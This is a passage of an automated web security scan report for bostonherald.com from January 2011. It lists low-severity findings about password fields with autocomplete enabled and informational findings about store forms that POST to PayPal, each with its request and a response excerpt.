Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.14. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.15. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.16. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.17. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.18. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.19. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.20. http://www.bostonherald.com/users/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

5.21. http://www.bostonherald.com/users/register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6. Cross-domain POST  previous  next
There are 20 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


6.1. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan212009.gif" width="104" height="105">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.2. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br />
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.3. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
